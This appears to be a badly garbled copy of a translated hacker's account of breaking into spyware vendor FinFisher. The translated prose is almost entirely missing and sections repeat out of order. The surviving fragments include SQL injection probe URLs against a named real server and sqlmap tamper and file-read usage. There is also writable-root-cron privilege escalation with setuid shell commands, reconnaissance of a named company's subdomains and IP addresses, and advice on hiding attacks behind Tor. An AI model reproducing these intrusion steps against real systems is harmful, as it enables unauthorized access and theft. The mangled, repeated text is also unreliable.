nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated